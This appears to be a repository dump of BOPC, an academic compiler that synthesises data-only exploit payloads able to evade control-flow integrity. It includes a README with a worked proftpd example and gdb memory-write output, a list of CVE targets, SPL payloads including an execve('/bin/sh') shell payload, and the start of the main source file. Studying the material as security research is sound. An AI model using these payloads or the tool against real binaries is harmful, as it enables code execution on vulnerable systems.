[
  {
    "path": "README.md",
    "content": "\n\n# Block Oriented Programming Compiler (BOPC)\n\n___\n\n\n## What is BOPC\n\n**NEW:** The talk from CCS'18 presentation is available\n[here](https://www.youtube.com/watch?v=iK7jhrK5uyg).\n\n\n\nBOPC (stands for _BOP Compiler_) is a tool for automatically synthesizing arbitrary,\nTuring-complete, _Data-Only_ payloads. BOPC finds execution traces in the binary that\nexecute the desired payload while adhering to the binary's Control Flow Graph (CFG).\nThis implies that the existing control flow hijacking defenses are not sufficient to\ndetect this style of execution, as execution does never violates the Control Flow\nIntegrity (CFI).\n\nEssentially, we can say that Block Oriented Programming is _code reuse under CFI_. \n\nBOPC works with basic blocks (hence the name \"block-oriented\"). What it does is to find\na set of _functional_ blocks (i.e., blocks that perform useful computations). This step\nis somewhat similar with finding Return Oriented Programming (ROP) gadgets.\nHaving the functional blocks, BOPC looks for _dispatcher_ blocks to that are used to\nstitch functional blocks together. Compared to ROP (that we can move from one gadget\nto the next without any limitation), here we can't do that as it would violate the CFI.\nInstead, BOPC finds a proper sequence for dispatcher blocks that naturally lead the\nexecution from one functional block to the next one.\nUnfortunately the problem of building _Data-Only_ payloads is NP-hard. \nHowever it turns out that in practice BOPC finds solution in a reasonable amount\nof time.\n\n\nFor more details on how BOPC works, please refer to our [paper](./ccs18_paper.pdf),\nand our [slides](./ccs18_slides.pdf) from CCS'18.\n\n\nTo operate, BOPC requires 3 inputs:\n* A target binary that has an _Arbitrary Memory Write_ (AWP) vulnerability (**hard requirement**)\n* The desired payload, expressed in a high level language called SPL (stands for _SPloit Language_)\n* The so-called \"_entry point_\", which is the first instruction in the binary that the\npayload execution should start. There can be more than one entry points and determining it is\npart of the vulnerability discovery process.\n\n\nThe output of BOPC is a set of \"what-where\" memory writes that indicate how the memory \nshould be initialized (i.e., what values to write at which memory addresses). \nWhen the execution reaches the entry point and the memory is initialized according to\nthe output of BOPC, the target binary execute the desired payload instead of continuing\nthe original execution.\n\n\n**Disclaimer:** This is a research project coded by a single guy. It's not a product,\nso do **not** expect it to work perfectly under all scenarios. It works nicely for the\n provided test cases, but beyond that we cannot guarantee that will work as expected.\n\n___\n\n\n## Installation\nJust run `setup.sh` :)\n\n___\n\n\n## How to use BOPC\n\nBOPC started as a hacky project, so several changes made to adapt it into an scientific\ncontext. That is, the implementation in the [paper](./ccs18_paper.pdf) is slightly\ndifferent from the actual implementation, as we omitted several implementation details\nfrom the paper. The actual implementation overview is shown below:\n![alt text](./source/images/BOPC_overview.png)\n\n\n\n### Command line arguments explained\n\nA good place to start are the command line arguments:\n\n```\nusage: BOPC.py [-h] [-b BINARY] [-a {save,load,saveonly}] [--emit-IR] [-d]\n               [-dd] [-ddd] [-dddd] [-V] [-s SOURCE] [-e ENTRY]\n               [-O {none,ooo,rewrite,full}] [-f {raw,idc,gdb}] [--find-all]\n               [--mapping-id ID] [--mapping MAP [MAP ...]] [--enum-mappings]\n               [--abstract-blk BLKADDR] [-c OPTIONS [OPTIONS ...]]\n\noptional arguments:\n  -h, --help            show this help message and exit\n\nGeneral Arguments:\n  -b BINARY, --binary BINARY\n                        Binary file of the target application\n  -a {save,load,saveonly}, --abstractions {save,load,saveonly}\n                        Work with abstraction file\n  --emit-IR             Dump SPL IR to a file and exit\n  -d                    Set debugging level to minimum\n  -dd                   Set debugging level to basic (recommended)\n  -ddd                  Set debugging level to verbose (DEBUG ONLY)\n  -dddd                 Set debugging level to print-everything (DEBUG ONLY)\n  -V, --version         show program's version number and exit\n\nSearch Options:\n  -s SOURCE, --source SOURCE\n                        Source file with SPL payload\n  -e ENTRY, --entry ENTRY\n                        The entry point in the binary that payload starts\n  -O {none,ooo,rewrite,full}, --optimizer {none,ooo,rewrite,full}\n                        Use the SPL optimizer (Default: none)\n  -f {raw,idc,gdb}, --format {raw,idc,gdb}\n                        The format of the solution (Default: raw)\n  --find-all            Find all the solutions\n\nApplication Capability:\n  -c OPTIONS [OPTIONS ...], --capability OPTIONS [OPTIONS ...]\n                        Measure application's capability. Options (can be many)\n                        \n                        all\tSearch for all Statements\n                        regset\tSearch for Register Assignments\n                        regmod\tSearch for Register Modifications\n                        memrd\tSearch for Memory Reads\n                        memwr\tSearch for Memory Writes\n                        call\tSearch for Function/System Calls\n                        cond\tSearch for Conditional Jumps\n                        load\tLoad capabilities from file\n                        save\tSave capabilities to file\n                        noedge\tDump statements and exit (don't calculate edges)\n\nDebugging Options:\n  --mapping-id ID       Run the Trace Searching algorithm on a given mapping ID\n  --mapping MAP [MAP ...]\n                        Run the Trace Searching algorithm on a given register mapping\n  --enum-mappings       Enumerate all possible mappings and exit\n  --abstract-blk BLKADDR\n                        Abstract a specific basic block and exit\n```\n\nOk, there are a lot of options here (divided into 4 categories) as BOPC can do several things.\n\nLet's start with the **General Arguments**. To avoid working directly with assembly, BOPC,\n\"abstracts\" each basic block into a set of \"actions\". For more details, please check\n[absblk.py](./source/absblk.py). Abstraction process symbolically executes each basic block\nin the binary and carefully monitors its actions. The abstraction process can take from a few\nminutes (for small binaries) to several hours (for the larger ones). Waiting that much every\ntime that you want to run BOPC does not sound a good idea, so BOPC uses an old trick: _caching_.\n\nThe abstraction process depends on the binary and not on the SPL payload nor the entry point,\nso we only need to calculate them *once* per binary. Therefore, we have to calculate the\nabstractions only one time, then save them into a file and each time loading them. \nThe `save` and `saveonly` options save the abstractions into a file. The only difference is that\n`saveonly` halts execution after it saves the abstractions, while `save` continues to search\nfor a solution. As you can guess, the `load` option loads the abstractions from a file.\n\nThe `--emit-IR` option is used to \"dump\" the IR representation of the SPL payload (this is\nanother intermediate result that you should not worry about it).\n\nBOPC provides 5 verbosity levels: no option, `-d`, `-dd`, `-ddd` and `-dddd`. I recommend you\nto use either the `-dd` or the `-ddd` to get a detailed progress status.\n\nLet's get into the **Search Options** options. The most important arguments here are the\n`--source` (which is a file that contains the SPL payload) and the `--entry` which is an\naddress inside the binary that indicates the entry point. Trace searching starts from the\nentry point, so this is quite important.\n\n\nThe optimizer (`-O` option) is double edge knife. On the one hand, it optimizes the SPL\npayload to make it more flexible. This means that it increases the likelihood to find a\nsolution. On the other hand, the search space (along with the execution time) is increased.\nThe decision is up to the user, hence the use of optimizer is optional. The 2 possible\noptimizations are the _out of order execution_ (`ooo` option) and the _statement rewriting_\n(`rewrite` option). \n\n\nThe out-of-order optimization reorders payload statements.\nConsider for example the following SPL payload:\n```\n\t__r0 = 13;\n\t__r1 = 37;\n```\n\nTo find a solution here, BOPC must find a functional block for the first statement (`__r0 = 13`)\nthen a functional block for the second statement (`__r1 = 37`) and a set of dispatcher blocks\nto connect these two statements. However these functional blocks may be far apart so a dispatcher\nmay not exist. However there's no difference if you execute the `__r0 = 13` statement first\nor second as it does not have any dependencies with the other statement. Thus if we rewrite\nthe payload as follows:\n```\n\t__r1 = 37;\n\t__r0 = 13;\n```\n\nIt may be possible to find another set dispatcher blocks, hopefully much smaller \n(path `A -> B` may be much longer than path `B -> A`) and find a solution.\n\nInternally, this is a **two-step** process. First the optimizer **groups** independent\nstatements together (for more details take a look [here](./source/optimize.py)) and\ngenerated and augmented SPL IR. Then, the trace search module, permutes statements\nwithin each group, each time resulting in a different SPL payload. However all these\npayloads are equivalent. As you can guess there are can be an exponential number of \npermutations, so this can take forever. To alleviate that, you can adjust\n`N_OUT_OF_ORDER_ATTEMPTS` configuration parameter and tell BOPC to stop after trying \n**N** iterations, instead of trying all of them.\n\n\n\nThe statement rewriting is an under development optimization that rewrites\nsome statements that do not exist in the binary. For instance if the SPL payload\nspawns a shell through 'execve()' but the target binary does not invoke\n`execve()` at all, then BOPC fails as there are no functional blocks for that statement.\nHowever, if the target binary invokes `execv()`, it may be possible to find a solution\nby replacing `execve()` with `execv()`. The optimizer contains a list of possible replacements,\nand adjust payload accordingly.\n\n\nAs we already explained, the output of BOPC is a set of \"what-where\" memory writes. There\nare several ways to express the output. For instance they can be raw lines containing the\naddress, the value and the size of the data that should be written in memory. Or they can\nbe a gdb/IDA script that can run directly on the debugger and modify the memory accordingly.\nThe last option is the best one as it you only need to run the BOPC output into the debugger.\nCurrently only the `gdb` format is implemented.\n\n\n\nThe **Application Capability** options used to measure _Application's capabilities_, that\ngives us upper bounds on **what** payloads the target binary is capable of executing.\n\n\nFinally the **Debugging Options** assist the audit/debugging/development process. They are used\nto bypass parts of the BOP work-flow. Do not use them unless you're doing changes in the code.\nRecall that BOPC finds a mapping between virtual and host registers along with a mapping\nbetween SPL variables and underlying memory addresses. If that mapping does not lead to\na solution it goes back and tries another one. If you want to focus on a specific mapping\n(e.g., let's say that code crashes at mapping 458), you don't have to wait for BOPC to try\nthe first 457 mappings first. By supplying the `--mapping-id=458` option you can skip\nall mappings and focus on that one. In case that you don't know the mapping number but you\nknow the actual mapping you can instead you the `--mapping` option: `--mapping=`__r0=rax __r1=rbx`\n\n\n\nFinally, BOPC has a lot of configuration options. You see all of them in \n[config.py](./source/config.py) and adjust them according to our needs. The default\nvalues are a nice trade off between accuracy and performance that I found during\nthen evaluation.\n\n\n## Example\n\nLet's see now how to actually use BOPC. The first thing to do is to get the basic block\nabstractions. This step is optional, but I expect that you are going to run BOPC several times,\nso it's a good idea to get the abstractions first:\n```\n./source/BOPC.py -dd --binary $BINARY --abstractions saveonly\n```\n\nThis calculates the abstractions and saves them into a  file named `$BINARY.abs`. Don't forget\nto enable debugging to see the status on the screen.\n\n\nWriting an SPL payload is pretty much like writing C:\n```C\nvoid payload() \n{ \n    string prog = \"/bin/sh\\0\";\n    int argv    = {&prog, 0x0};\n\n    __r0 = &prog;\n    __r1 = &argv;\n    __r2 = 0;\n    \n    execve(__r0, __r1, __r2);\n}\n```\n\n\nPlease take a look at the available [payloads](./payloads) to see all features of SPL.\nDon't expect to write crazy program with SPL; Yes, in theory you can write any program.\nIn practice the more complicated is the SPL payload, the more the complexity increases\nand the harder it gets to find a solution.\n\n\nRunning BOPC is as simple as the following:\n```\n./source/BOPC.py -dd --binary $BINARY --source $PAYLOAD --abstractions load \\\n--entry $ENTRY --format gdb\n```\n\nIf everything goes well an `*.gdb` file will be created that contains the set of memory writes\nto execute the desired payload.\n\n\n### Pruning search space\n\nA common problem is that there can be thousands of mappings (it's exponential based on the \nnumber of registers and variables that are used). Each mapping can take up to a minute to test\n(assuming out of order execution and other optimizations), so BOPC may run for days.\n\nHowever, if you know approximately where a solution could be, you can ask BOPC to quickly find\n(and verify) it, without trying all mappings. Let's assume that you want to execute the following\nSPL payload:\n```C\nvoid payload() \n{ \n    string msg = \"This is my random message! :)\\0\";\n\n    __r0 = 0;\n    __r1 = &msg;\n    __r2 = 32;\n\n    write( __r0, __r1, __r2 );\n}\n```\n\nBecause we have a system call, we know the register mapping: \n`__r0 <-> rdi, __r1 <-> rsi, __r2 <-> rdx`.\n\nLet's assume that we're on `proftpd` binary which contains the following \"all-in-one\"\nfunctional block:\n```Assembly\n.text:000000000041D0B5 loc_41D0B5:\n.text:000000000041D0B5        mov     edi, cs:scoreboard_fd ; fd\n.text:000000000041D0BB        mov     edx, 20h        ; n\n.text:000000000041D0C0        mov     esi, offset header ; buf\n.text:000000000041D0C5        call    _write\n```\n\nThe abstractions for this basic block, will be the following (recall that to get the\nabstractions for a single basic block, you need to pass the `--abstract-blk 0x41D0B5`\nin the command line).\n```\n[22:02:07,822] [+] Abstractions for basic block 0x41d0b5:\n[22:02:07,823] [+]          regwr :\n[22:02:07,823] [+] \t\trsp = {'writable': True, 'const': 576460752303359992L, 'type': 'concrete'}\n[22:02:07,823] [+] \t\trdi = {'sym': {}, 'memrd': None, 'type': 'deref', 'addr': <BV64 0x66e9e0>, 'deps': []}\n[22:02:07,823] [+] \t\trsi = {'writable': True, 'const': 6787008L, 'type': 'concrete'}\n[22:02:07,823] [+] \t\trdx = {'writable': False, 'const': 32L, 'type': 'concrete'}\n[22:02:07,823] [+]          memrd : set([(<SAO <BV64 0x66e9e0>>, 32)])\n[22:02:07,823] [+]          memwr : set([(<SAO <BV64 0x7ffffffffff07f8>>, <SAO <BV64 0x41d0ca>>)])\n[22:02:07,823] [+]          conwr : set([(576460752303359992L, 64)])\n[22:02:07,823] [+]       splmemwr : []\n[22:02:07,823] [+]           call : {}\n[22:02:07,823] [+]           cond : {}\n[22:02:07,823] [+]        symvars : {}\n[22:02:07,823] [*] \n```\n\nHere, `__r0 <-> rdi` is loaded indirectly and the value of `__r1 <-> rsi` (which holds the `msg` \nvariable) is `6787008` or `0x678fc0` in hex. Then we enumerate all possible mappings with the\n`--enum-mappings` option. Here, there are *287* possible mappinges, but there are instances that\nwe have thousands of mappings:\n\n\nIf we look at the output we can quickly search for the appropriate mapping, which in our case\nis mapping *#89*:\n```\n[.... TRUNCATED FOR BREVITY ....]\n[21:59:28,471] [*] Trying mapping #88:\n[21:59:28,471] [*] \tRegisters: __r0 <-> rdi | __r1 <-> rsi | __r2 <-> rdx\n[21:59:28,471] [*] \tVariables: msg <-> *<BV64 0x7ffffffffff1440>\n[21:59:28,614] [*] Trying mapping #89:\n[21:59:28,614] [*] \tRegisters: __r0 <-> rdi | __r1 <-> rsi | __r2 <-> rdx\n[21:59:28,614] [*] \tVariables: msg <-> 0x678fc0L\n[21:59:28,762] [*] Trying mapping #90:\n[21:59:28,762] [*] \tRegisters: __r0 <-> rdi | __r1 <-> rsi | __r2 <-> rdx\n[21:59:28,762] [*] \tVariables: msg <-> *<BV64 r12_56287_64 + 0x28>\n[.... TRUNCATED FOR BREVITY ....]\n[22:00:04,709] [*] Trying mapping #287:\n[22:00:04,709] [*] \tRegisters: __r0 <-> rdi | __r1 <-> rsi | __r2 <-> rdx\n[22:00:04,709] [*] \tVariables: msg <-> *<BV64 __add__(((0#32 .. rbx_294059_64[31:0]) << 0x5), r12_294068_64, 0x10)>\n[22:00:04,979] [+] Trace searching algorithm finished with exit code 0\n```\n\nNow that we know the actual mapping, we can tell BOPC to focus on this one. All we have to\ndo is to pass the `--mapping-id 89` option.\n\n\nWe run this and after 1 minute and 51 seconds later, we get the solution:\n```\n#\n# This file has been created by BOPC at: 29/03/2018 22:04\n# \n# Solution #1\n# Mapping #89\n# Registers: __r0 <-> rdi | __r1 <-> rsi | __r2 <-> rdx\n# Variables: msg <-> 0x678fc0L\n# \n# Simulated Trace: [(0, '41d0b5', '41d0b5'), (4, '41d0b5', '41d0b5'), (6, '41d0b5', '41d0b5'), (8, '41d0b5', '41d0b5'), (10, '41d0b5', '41d0b5')]\n# \n\nbreak *0x403740\nbreak *0x41d0b5\n\n# Entry point\nset $pc = 0x41d0b5 \n\n# Allocation size is always bigger (it may not needed at all)\nset $pool = malloc(20480)\n\n# In case that rbp is not initialized\nset $rbp = $rsp + 0x800 \n\n# Stack and frame pointers aliases\nset $stack = $rsp \nset $frame = $rbp \n\nset {char[30]} (0x678fc0) = {0x54, 0x68, 0x69, 0x73, 0x20, 0x69, 0x73, 0x20, 0x6d, 0x79, 0x20, 0x72, 0x61, 0x6e, 0x64, 0x6f, 0x6d, 0x20, 0x6d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x21, 0x20, 0x3a, 0x29, 0x00}\n\nset {char[8]} (0x66e9e0) = {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00}\n```\n\nLet's take a closer look here. The _Simulated Trace_ comment shows the path that BOPC followed.\nThis is a list of `($pc, $src, $dst)` tuples. `$pc` is the program counter of the SPL statement.\n`$src` is the address of the functional block for the current SPL statement and `$dst` is the\naddress of the next functional block.\n\n\nBefore it runs, script adjusts `$rip` to point to the entry point, and makes sure that\nstack pointers (`$rsp`, `$rbp`) are valid. It also allocates a \"variable pool\" (for\nmore details please look at [simulate.py](./source/simulate.py)) which in our case is not\nused.\n\nThen we have the two actual memory writes at `0x678fc0` and at `0x66e9e0`. If you load\nthe binary in gdb and run this script you will see your payload being executed:\n\n```\n(gdb) break main\nBreakpoint 5 at 0x4041a0\n(gdb) run\nStarting program: /home/ispo/BOPC/evaluation/proftpd \n\nBreakpoint 1, 0x00000000004041a0 in main ()\n(gdb) continue\nContinuing.\n\nBreakpoint 3, 0x000000000041d0b5 in pr_open_scoreboard ()\n(gdb) continue\nContinuing.\n\nBreakpoint 2, 0x0000000000403740 in write@plt ()\n(gdb) continue\nContinuing.\nThis is my random message! :)\nProgram received signal SIGSEGV, Segmentation fault.\n0x00007fffffffde60 in ?? ()\n```\n\nNote that BOPC stops after executing the desired payload (hence the crash). If you\nwant to avoid this situation you can use the `returnto` SPL statement to naturally\ntransfer execution to a safe location.\n\n\n\n### Measuring application capabilities\n\n**NOTE:** This is a new concept, which is not mentioned in the paper. \n\nBeyond finding Data-Only payloads, BOPC provides some basic capability measurements.\nAlthough it is not related to the Block Oriented Programming, it can provide upper\nbounds and strong \"indications\" on what types of payloads can be executed and what\nare not. This is very useful as we can quickly find types of payloads that **cannot**\nbe executed in the target binary.  \nTo get the all application capabilities run the following code:\n```\n./source/BOPC.py -dd --binary $BINARY --abstractions load --capability all save\n```\n\nIf you want to simply dump all functional gadgets for a specific statement, you can do\nit as follows:\n```\n./source/BOPC.py -dd --binary $BINARY --abstractions load --capability $STMT noedge\n```\n\nWhere `$STMT` can be one ore more from `{all, regset, regmod, memrd, memwr, call, cond}`.\nThe `noedge` option is to boost things up (essentially it does not calculate edges in the\ncapability graph; Each node in the capability graph represents a functional block from\nthe binary while and edge represents the context-sensitive shortest path distance\nbetween two functional blocks).\n\n\n___\n\n\n## Final Notes (please read them carefully!)\n\n* When the symbolic execution engine deals with filesystem (i.e., it has to `open` a file),\nwe have to provide it a valid file. Filename is defined in `SYMBOLIC_FILENAME` in \n[coreutils.py](./source/coreutils.py).\n\n* If you want to visualize things, just uncomment the code in search.py. I'm too lazy to add\nCLI flags to trigger it :P\n\n* In case that addresses used by concolic execution do not work, adjust them from \n[simulate.py](./source/simulate.py)\n\n* Make sure that `$rsp` is consistent in `dump()` in [simulate.py](./source/simulate.py)\n\n* For any questions/concerns regarding the code, you can contact [ispo](https://github.com/ispoleet)\n\n___\n\n"
  },
  {
    "path": "evaluation/README.md",
    "content": "\n\n# Block Oriented Programming Compiler (BOPC)\n___\n\n\n### Vulnerable Application Overview\n\n\n| Application                | CVE           |\n|----------------------------|---------------|\n|[ProFTPd](./proftpd)        | CVE-2006-5815 |\n|[nginx](./nginx1)           | CVE-2013-2028 |\n|[sudo](./sudo)              | CVE-2012-0809 |\n|[orzhttpd](./orzhttpd)      | BugtraqID 41956 |\n|[wuftdp](./wuftpd)          | CVE-2000-0573 |\n|[nullhttpd](./nullhttpd)    | CVE-2002-1496 |\n|[opensshd](./opensshd)      | CVE-2001-0144 |\n|[wireshark](./lt-wireshark) | CVE-2014-2299 |\n|[apache](./httpd)           | CVE-2006-3747 |\n|[smbclient](./smbclient)    | CVE-2009-1886 |\n\n___\n"
  },
  {
    "path": "payloads/README.md",
    "content": "\n\n# Block Oriented Programming Compiler (BOPC)\n___\n\n\n### SPL Payload Overview\n\n\n| Payload                  | Description                                 |\n|--------------------------|---------------------------------------------|\n| [regset4](./regset4.spl) | Initialize 4 registers with arbitrary values |\n| [regref4](./regref4.spl) | Initialize 4 registers with pointers to arbitrary memory |\n| [regset5](./regset5.spl) | Initialize 5 registers with arbitrary values |\n| [regref5](./regref5.spl) | Initialize 5 registers with pointers to arbitrary memory |\n| [regmod](./regmod.spl)   | Initialize a register with an arbitrary value and modify it |\n| [memrd](./memrd.spl)     | Read from arbitrary memory |\n| [memwr](./memwr.spl)     | Write to arbitrary memory |\n| [print](./print.spl)     | Display a message to stdout using write |\n| [execve](./execve.spl)   | Spawn a shell through execve |\n| [abloop](./abloop.spl)   | Perform an arbitrarily long bounded loop utilizing regmod |\n| [infloop](./infloop.spl) | Perform an infinite loop that sets a register in its body |\n| [ifelse](./ifelse.spl)   | An if-else condition based on a register comparison |\n| [loop](./loop.spl)       | Conditional loop with register modification |\n\n\n___\n"
  },
  {
    "path": "payloads/abloop.spl",
    "content": "// \n// BOPC Evaluation\n//\n// Arbitrary bounded loop with register modification\n//\nvoid payload() \n{ \n    __r0 = 0;\n\nLOOP:\n\n    __r0 += 1;\n\n    goto LOOP;\n}\n\n"
  },
  {
    "path": "payloads/execve.spl",
    "content": "// \n// BOPC Evaluation\n//\n// execve('/bin/sh') payload\n//\nvoid payload() \n{ \n    string prog = \"/bin/sh\\0\";\n    int argv    = {&prog, 0x0};\n\n    __r0 = &prog;\n    __r1 = &argv;\n    __r2 = 0;\n    \n    execve(__r0, __r1, __r2);\n\n    // return ?\n}\n"
  },
  {
    "path": "payloads/ifelse.spl",
    "content": "// \n// BOPC Evaluation\n//\n// Simple if-else condition\n//\nvoid payload() \n{ \n    __r0 = 0;\n\n    if (__r0 != 0 ) goto SKIP;\n\n    __r1 = 1;\n\n    goto END;\n\nSKIP:\n    __r1 = 0;\n\n\nEND:\n    // return 0x400ca7;\n    __r0 = 0;\n\n}\n"
  },
  {
    "path": "payloads/infloop.spl",
    "content": "// \n// BOPC Evaluation\n//\n// Infinity loop with constant assignment\n//\nvoid payload() \n{ \n\n//  __r0 = 1;\n\nLOOP:\n    __r1 = 0;\n\n    goto LOOP;\n}\n"
  },
  {
    "path": "payloads/loop.spl",
    "content": "// \n// BOPC Evaluation\n//\n// Simple loop\n//\nvoid payload() \n{ \n    __r0 = 0;\n\nLOOP:\n    __r0 += 1;\n\n    if (__r0 != 3 ) goto LOOP;\n}\n"
  },
  {
    "path": "payloads/memrd.spl",
    "content": "// \n// BOPC Evaluation\n//\n// Memory Load\n//\nvoid payload() \n{ \n    int array = {1, 2, 3, 4, 5};\n    \n    __r1 = &array;\n\n    __r0 = *__r1;\n\n}\n"
  },
  {
    "path": "payloads/memwr.spl",
    "content": "// \n// BOPC Evaluation\n//\n// Memory Store\n//\nvoid payload() \n{ \n    int array = {1, 2, 3, 4, 5};\n    \n    __r0 = &array;\n    __r1 = 0;\n\n    *__r0 = __r1;\n\n}\n"
  },
  {
    "path": "payloads/print.spl",
    "content": "// \n// BOPC Evaluation\n//\n// Print an arbitrary message to stdout using write()\n//\nvoid payload() \n{ \n    string msg = \"This is my random message! :)\\0\";\n\n    __r0 = 0;\n    __r1 = &msg;\n    __r2 = 1;\n\n\n    write( __r0, __r1, __r2 );\n\n    // return 0x?? ;s\n}\n"
  },
  {
    "path": "payloads/regmod.spl",
    "content": "// \n// BOPC Evaluation\n//\n// Register modification\n//\nvoid payload() \n{ \n    __r0 = 0;\n\n    __r0 += 1;\n}\n"
  },
  {
    "path": "payloads/regref4.spl",
    "content": "// \n// BOPC Evaluation\n//\n// Initialize 4 registers with references\n//\nvoid payload() \n{ \n    int    var_a = 0x100;\n    string var_b = \"this is a random string\";\n    int    var_c = {1, 2, 3, &var_a, 4, &var_b};\n    int    var_d = &var_c;\n\n    __r0 = &var_a;\n    __r1 = &var_b;\n    __r2 = &var_c;\n    __r3 = &var_d;\n}\n"
  },
  {
    "path": "payloads/regref5.spl",
    "content": "// \n// BOPC Evaluation\n//\n// Initialize 5 registers with references\n//\nvoid payload() \n{ \n\tlong   var_a = 0x100;\n\tstring var_b = \"this is a random string\\x00\";\n\n\tlong    *var_c = {1, 2, 3, 4, &var_a, &var_b};\n\tlong    var_d = &var_c;\n\tlong    *var_e = {&var_d, &var_d, &var_d};\n\n\t__r0 = &var_a;\n\t__r1 = &var_b;\n\t__r2 = &var_c;\n\t__r3 = &var_d;\n\t__r4 = &var_e;\n\n\t// return ??\n}\n"
  },
  {
    "path": "payloads/regset4.spl",
    "content": "// \n// BOPC Evaluation\n//\n// Initialize 4 registers\n//\nvoid payload() \n{ \n    __r0 = 0;\n    __r1 = 1;\n    __r2 = 2;\n    __r3 = 3;\n}\n"
  },
  {
    "path": "payloads/regset5.spl",
    "content": "// \n// BOPC Evaluation\n//\n// Initialize 5 registers\n//\nvoid payload() \n{ \n    __r0 = 0;\n    __r1 = 1;\n    __r2 = 2;\n    __r3 = 3;\n    __r4 = 4;\n}\n"
  },
  {
    "path": "setup.sh",
    "content": "#!/bin/bash\n# -------------------------------------------------------------------------------------------------\n#\n#    ,ggggggggggg,     _,gggggg,_      ,ggggggggggg,      ,gggg,  \n#   dP\"\"\"88\"\"\"\"\"\"Y8, ,d8P\"\"d8P\"Y8b,   dP\"\"\"88\"\"\"\"\"\"Y8,  ,88\"\"\"Y8b,\n#   Yb,  88      `8b,d8'   Y8   \"8b,dPYb,  88      `8b d8\"     `Y8\n#    `\"  88      ,8Pd8'    `Ybaaad88P' `\"  88      ,8Pd8'   8b  d8\n#        88aaaad8P\" 8P       `\"\"\"\"Y8       88aaaad8P\",8I    \"Y88P'\n#        88\"\"\"\"Y8ba 8b            d8       88\"\"\"\"\"   I8'          \n#        88      `8bY8,          ,8P       88        d8           \n#        88      ,8P`Y8,        ,8P'       88        Y8,          \n#        88_____,d8' `Y8b,,__,,d8P'        88        `Yba,,_____, \n#       88888888P\"     `\"Y8888P\"'          88          `\"Y8888888 \n#\n#   The Block Oriented Programming (BOP) Compiler - v2.1\n#\n#\n# Kyriakos Ispoglou (ispo) - ispo@purdue.edu\n# PURDUE University, Fall 2016-18\n# -------------------------------------------------------------------------------------------------\nmsg() {\n    GREEN='\\033[01;32m'                         # bold green\n    NC='\\033[0m'                                # no color\n    echo -e \"${GREEN}[INFO]${NC} $1\"\n}\n\nerror() {\n    RED='\\033[01;31m'                           # bold red\n    NC='\\033[0m'                                # no color\n    echo -e \"${RED}[ERROR]${NC} $1\"\n}\n\n\n# display fancy foo\nclear\necho\necho -e '\\t%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%'\necho -e '\\t%                                                                    %'\necho -e '\\t%                :::::::::   ::::::::  :::::::::   ::::::::          %'\necho -e '\\t%               :+:    :+: :+:    :+: :+:    :+: :+:    :+:          %'\necho -e '\\t%              +:+    +:+ +:+    +:+ +:+    +:+ +:+                  %'\necho -e '\\t%             +#++:++#+  +#+    +:+ +#++:++#+  +#+                   %'\necho -e '\\t%            +#+    +#+ +#+    +#+ +#+        +#+                    %'\necho -e '\\t%           #+#    #+# #+#    #+# #+#        #+#    #+#              %'\necho -e '\\t%          #########   ########  ###         ########                %'\necho -e '\\t%                                                                    %'\necho -e '\\t%                Block Oriented Programming Compiler                 %'\necho -e '\\t%                                                                    %'\necho -e '\\t%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%'\necho \nmsg \"BOPC Installation Guide has been started ...\"\n\n\n# base check (we need root)\nif [ \"$EUID\" -ne 0 ]; then\n    error \"Script needs root permissions to install the required packages.\"\n    msg \"Please run as 'sudo $0' (you can have a look at the source, if you don't trust me)\"\n    echo\n\n    exit\nfi\n\n# install prerequisites first\napt-get install --yes python-pip\napt-get install --yes graphviz libgraphviz-dev\napt-get install --yes pkg-config python-tk \n\n\n# install pip packages\npip install angr==7.8.9.26\npip install claripy==7.8.9.26\npip install matplotlib\npip install simuvex\n# networkx must be installed after simuvex and angr, since they depend\n# on networkx 2.1\npip install networkx==1.11\npip install graphviz==0.8.1\npip install pygraphviz==1.3.1\n\n\nmsg \"BOPC Installation completed ...\"\nmsg \"Have a nice day :)\"\necho\n\n# -------------------------------------------------------------------------------------------------\n"
  },
  {
    "path": "source/BOPC.py",
    "content": "#!/usr/bin/env python2\n# -------------------------------------------------------------------------------------------------\n#\n#    ,ggggggggggg,     _,gggggg,_      ,ggggggggggg,      ,gggg,  \n#   dP\"\"\"88\"\"\"\"\"\"Y8, ,d8P\"\"d8P\"Y8b,   dP\"\"\"88\"\"\"\"\"\"Y8,  ,88\"\"\"Y8b,\n#   Yb,  88      `8b,d8'   Y8   \"8b,dPYb,  88      `8b d8\"     `Y8\n#    `\"  88      ,8Pd8'    `Ybaaad88P' `\"  88      ,8Pd8'   8b  d8\n#        88aaaad8P\" 8P       `\"\"\"\"Y8       88aaaad8P\",8I    \"Y88P'\n#        88\"\"\"\"Y8ba 8b            d8       88\"\"\"\"\"   I8'          \n#        88      `8bY8,          ,8P       88        d8           \n#        88      ,8P`Y8,        ,8P'       88        Y8,          \n#        88_____,d8' `Y8b,,__,,d8P'        88        `Yba,,_____, \n#       88888888P\"     `\"Y8888P\"'          88          `\"Y8888888 \n#\n#   The Block Oriented Programming (BOP) Compiler - v2.1\n#\n#\n# Kyriakos Ispoglou (ispo) - ispo@purdue.edu\n# PURDUE University, Fall 2016-18\n# -------------------------------------------------------------------------------------------------\n#\n# BOPC.py:\n#\n#\n# This is the main module of BOPC. It configures the environment and launches the other modules.\n#\n# -------------------------------------------------------------------------------------------------\nfrom coreutils import *\nimport absblk     as A\nimport compile    as C\nimport optimize   as O\nimport mark       as M\nimport search     as S\nimport capability as P\n\nimport argparse\nimport textwrap\nimport ntpath\nimport angr\nimport os\nimport sys\n\n\n\n# ------------------------------------------------------------------------------------------------\n# Constant Definitions\n# ------------------------------------------------------------------------------------------------\nVERSION  = 'v2.1'                                   # current version\ncomments = ''                                       # Additional comments to display on startup\n\n\n\n# -------------------------------------------------------------------------------------------------\n# parse_args(): This function processes the command line arguments.\n#\n# :Ret: None.\n#\ndef parse_args():\n    # create the parser object and the groups\n    parser = argparse.ArgumentParser(formatter_class=argparse.RawTextHelpFormatter)\n\n    group_g = parser.add_argument_group('General Arguments')\n    group_s = parser.add_argument_group('Search Options')\n    group_c = parser.add_argument_group('Application Capability')\n    group_d = parser.add_argument_group('Debugging Options')\n\n\n    # -------------------------------------------------------------------------\n    # Group for general arguments\n    # -------------------------------------------------------------------------\n    group_g.add_argument(\n        '-b', \"--binary\",\n        help     = \"Binary file of the target application\",\n        action   = 'store',\n        dest     = 'binary',\n        required = False, # True\n    